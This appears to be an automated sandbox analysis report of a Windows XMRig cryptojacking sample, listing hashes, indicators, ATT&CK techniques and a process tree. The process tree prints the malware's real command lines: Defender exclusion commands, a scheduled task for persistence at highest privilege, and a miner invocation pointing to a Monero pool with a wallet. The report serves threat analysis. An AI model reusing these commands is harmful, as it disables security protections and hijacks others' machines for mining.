xmrig | 6c649c5633d1b3b8832e1b5c13b176482179f38cfb021a5f81e22757788c72b0

Analysis

max time kernel
78s
max time network
125s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
13-07-2023 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

2.5MB
MD5

f339ecfb8d74dc53102ca10d1b34b307
SHA1

ad11d6129270cbe9f681a9dba78134ca2b451bd7
SHA256

6c649c5633d1b3b8832e1b5c13b176482179f38cfb021a5f81e22757788c72b0
SHA512

7fac9c54e9fe794d0f80be4eb724f2ef9735e1fb2f3a9590cc67ac8f3cec9259422dc4f99fd225c0395641a92d6d0b21a0ae4875b30632dfe0b4c6d0cfa96b70
SSDEEP

24576:Fq3yIhAzArEu+epp7T6km+Q+VuhHQDaEFRGocQngdHdq/UN3RZ7T:FuELLer1m+QZwDZRGXQngdHd5NRZ

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/836-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-130-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-131-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-134-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-136-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-135-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-139-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-143-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-141-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/836-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2060	ELRX.exe

Loads dropped DLL 1 IoCs

pid	Process
2916	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2060 set thread context of 836	2060	ELRX.exe	46

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2032	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
940	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2408	powershell.exe
2212	powershell.exe
2856	powershell.exe
2888	powershell.exe
2060	ELRX.exe
2060	ELRX.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2564	file.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2060	ELRX.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 2408	2564	file.exe	30
PID 2564 wrote to memory of 2408	2564	file.exe	30
PID 2564 wrote to memory of 2408	2564	file.exe	30
PID 2564 wrote to memory of 2212	2564	file.exe	33
PID 2564 wrote to memory of 2212	2564	file.exe	33
PID 2564 wrote to memory of 2212	2564	file.exe	33
PID 2564 wrote to memory of 2916	2564	file.exe	34
PID 2564 wrote to memory of 2916	2564	file.exe	34
PID 2564 wrote to memory of 2916	2564	file.exe	34
PID 2916 wrote to memory of 940	2916	cmd.exe	36
PID 2916 wrote to memory of 940	2916	cmd.exe	36
PID 2916 wrote to memory of 940	2916	cmd.exe	36
PID 2916 wrote to memory of 2060	2916	cmd.exe	37
PID 2916 wrote to memory of 2060	2916	cmd.exe	37
PID 2916 wrote to memory of 2060	2916	cmd.exe	37
PID 2060 wrote to memory of 2888	2060	ELRX.exe	41
PID 2060 wrote to memory of 2888	2060	ELRX.exe	41
PID 2060 wrote to memory of 2888	2060	ELRX.exe	41
PID 2060 wrote to memory of 2856	2060	ELRX.exe	40
PID 2060 wrote to memory of 2856	2060	ELRX.exe	40
PID 2060 wrote to memory of 2856	2060	ELRX.exe	40
PID 2060 wrote to memory of 2784	2060	ELRX.exe	42
PID 2060 wrote to memory of 2784	2060	ELRX.exe	42
PID 2060 wrote to memory of 2784	2060	ELRX.exe	42
PID 2784 wrote to memory of 2032	2784	cmd.exe	44
PID 2784 wrote to memory of 2032	2784	cmd.exe	44
PID 2784 wrote to memory of 2032	2784	cmd.exe	44
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46
PID 2060 wrote to memory of 836	2060	ELRX.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2212
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp893C.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:940
- - C:\ProgramData\CodeShorts\ELRX.exe
    "C:\ProgramData\CodeShorts\ELRX.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2888
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2784
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ELRX" /tr "C:\ProgramData\CodeShorts\ELRX.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2032
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CodeShorts\ELRX.exe

Filesize
373.0MB

MD5
d4ee113bbe592d79dbe397668bea556c

SHA1
7de00951217178794b51a279b8a652f88228f5d3

SHA256
94ce96872949b4e412981bb7a7367c064c79546c0a379d8528c289b15e74641a

SHA512
568ceba05aee089deed7fe4566e7a09e8a892bba3ab74bec59b877bee8002db49191508fbc642e36bac483d675e21467db9e6d08ff724af8605b77a81eb64c49

Download Submit
C:\ProgramData\CodeShorts\ELRX.exe

Filesize
395.4MB

MD5
4a620edf12196cb61cb520c37c08c3dd

SHA1
00a94147af98f38c86ac73fdef3b58be50b5d639

SHA256
547750a2ea84c24011bd8f24652174bca98a031e45c5e112697ab604729978a0

SHA512
9a8ec0464002d76b195a90443428aedafe7ce96ee03219b11b750e54a58413b2b536955c59d2ce6b4df7f71a0aa8279a8c6e32201c2c2ceaa903f6fa79dccc66

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp893C.tmp.bat

Filesize
143B

MD5
e6953040e3db6e920ef5394583b16957

SHA1
8d34f7a4fd57fadc4687c9b0b67c36856779bea8

SHA256
91adbf2304c9cc36aa6fe2c06cfa8727cdaf617b586a76ec49169c69b01cbe28

SHA512
a949b86065ab2137a2f746df5d234c64c17177d91a7006211c404623e21ac7558f5f181313de5592c6fcaa9d78f4c110ca3e2d0ed5d7a8f7c382f621ab9eabc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp893C.tmp.bat

Filesize
143B

MD5
e6953040e3db6e920ef5394583b16957

SHA1
8d34f7a4fd57fadc4687c9b0b67c36856779bea8

SHA256
91adbf2304c9cc36aa6fe2c06cfa8727cdaf617b586a76ec49169c69b01cbe28

SHA512
a949b86065ab2137a2f746df5d234c64c17177d91a7006211c404623e21ac7558f5f181313de5592c6fcaa9d78f4c110ca3e2d0ed5d7a8f7c382f621ab9eabc1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0e50a70bfc53fc2fb6f584ec500e6667

SHA1
fe67670f02bb97d7aa4ec30c013f8d6231aca1b3

SHA256
39b79c0318631c7a0f8dee849267ac9968f7256d297db38e58d5f77c8d25e6a5

SHA512
20214dc6143ffdd9da4053ed0e387008f136b5a627f88a70f2a6074c94c570f7513a63c0a77fd1f50d12f967a9eea1c2f6eb9149fec3461045d0a0e7e517f55f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0e50a70bfc53fc2fb6f584ec500e6667

SHA1
fe67670f02bb97d7aa4ec30c013f8d6231aca1b3

SHA256
39b79c0318631c7a0f8dee849267ac9968f7256d297db38e58d5f77c8d25e6a5

SHA512
20214dc6143ffdd9da4053ed0e387008f136b5a627f88a70f2a6074c94c570f7513a63c0a77fd1f50d12f967a9eea1c2f6eb9149fec3461045d0a0e7e517f55f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b2a1a8f181664823bc3ca17989709b74

SHA1
f372c560a98b73a78c0798212c3753929f3c9c61

SHA256
ab5dac9f90e87da4fe90411908fafe48549dc0447bfd33ea7db9f68a81394351

SHA512
f2f8153289a3aec21d0e0051d199bc7a6edc93cf158ccc645495c3fc57357876a4eeab0e5d747fcb002713b3bc91cc0a16440f13cfefb5a2b77f45bf9a1366ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRCNY5T1AATGNFNA55YH.temp

Filesize
7KB

MD5
0e50a70bfc53fc2fb6f584ec500e6667

SHA1
fe67670f02bb97d7aa4ec30c013f8d6231aca1b3

SHA256
39b79c0318631c7a0f8dee849267ac9968f7256d297db38e58d5f77c8d25e6a5

SHA512
20214dc6143ffdd9da4053ed0e387008f136b5a627f88a70f2a6074c94c570f7513a63c0a77fd1f50d12f967a9eea1c2f6eb9149fec3461045d0a0e7e517f55f

Download Submit
\ProgramData\CodeShorts\ELRX.exe

Filesize
387.4MB

MD5
b112d7487ccd31a9ca5a5b1a1942c9b3

SHA1
41868df80013cd7b8d88b7aa9ccad688a3d33bab

SHA256
4169521beea0018584a5a37361e0f157e8f08451979602c950e8a1eb0c5b5cd9

SHA512
312b560d381e55164ece7a725a14a77c38179d81a55ac23c6362b7c3526917cdcf2050d161761f19f0e4bc78a0a59318eacdc09421efa82888a972bd5f7257e3

Download Submit
memory/836-142-0x0000000000160000-0x0000000000180000-memory.dmp

Filesize
128KB

Download
memory/836-137-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

Filesize
4KB

Download
memory/836-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-139-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-135-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-136-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-128-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-126-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-141-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-143-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-130-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-131-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-134-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-132-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/836-145-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2060-96-0x000000001B2E0000-0x000000001B360000-memory.dmp

Filesize
512KB

Download
memory/2060-144-0x000007FEF46E0000-0x000007FEF50CC000-memory.dmp

Filesize
9.9MB

Download
memory/2060-97-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/2060-94-0x000007FEF46E0000-0x000007FEF50CC000-memory.dmp

Filesize
9.9MB

Download
memory/2060-95-0x0000000000B90000-0x0000000000E12000-memory.dmp

Filesize
2.5MB

Download
memory/2060-116-0x000007FEF46E0000-0x000007FEF50CC000-memory.dmp

Filesize
9.9MB

Download
memory/2060-118-0x000000001B2E0000-0x000000001B360000-memory.dmp

Filesize
512KB

Download
memory/2212-75-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2212-68-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/2212-69-0x00000000024F0000-0x00000000024F8000-memory.dmp

Filesize
32KB

Download
memory/2212-71-0x000007FEF1B10000-0x000007FEF24AD000-memory.dmp

Filesize
9.6MB

Download
memory/2212-78-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2212-74-0x0000000002984000-0x0000000002987000-memory.dmp

Filesize
12KB

Download
memory/2408-73-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/2408-70-0x000007FEF1B10000-0x000007FEF24AD000-memory.dmp

Filesize
9.6MB

Download
memory/2408-72-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/2408-76-0x00000000027EB000-0x0000000002852000-memory.dmp

Filesize
412KB

Download
memory/2564-89-0x000007FEF50D0000-0x000007FEF5ABC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-55-0x000007FEF50D0000-0x000007FEF5ABC000-memory.dmp

Filesize
9.9MB

Download
memory/2564-56-0x000000001B2E0000-0x000000001B360000-memory.dmp

Filesize
512KB

Download
memory/2564-57-0x0000000000550000-0x0000000000551000-memory.dmp

Filesize
4KB

Download
memory/2564-54-0x00000000011C0000-0x0000000001442000-memory.dmp

Filesize
2.5MB

Download
memory/2564-77-0x000007FEF50D0000-0x000007FEF5ABC000-memory.dmp

Filesize
9.9MB

Download
memory/2856-117-0x000000001B330000-0x000000001B612000-memory.dmp

Filesize
2.9MB

Download
memory/2856-109-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2856-110-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2856-113-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2856-120-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2856-121-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2888-114-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2888-115-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2888-122-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2888-119-0x0000000002470000-0x00000000024F0000-memory.dmp

Filesize
512KB

Download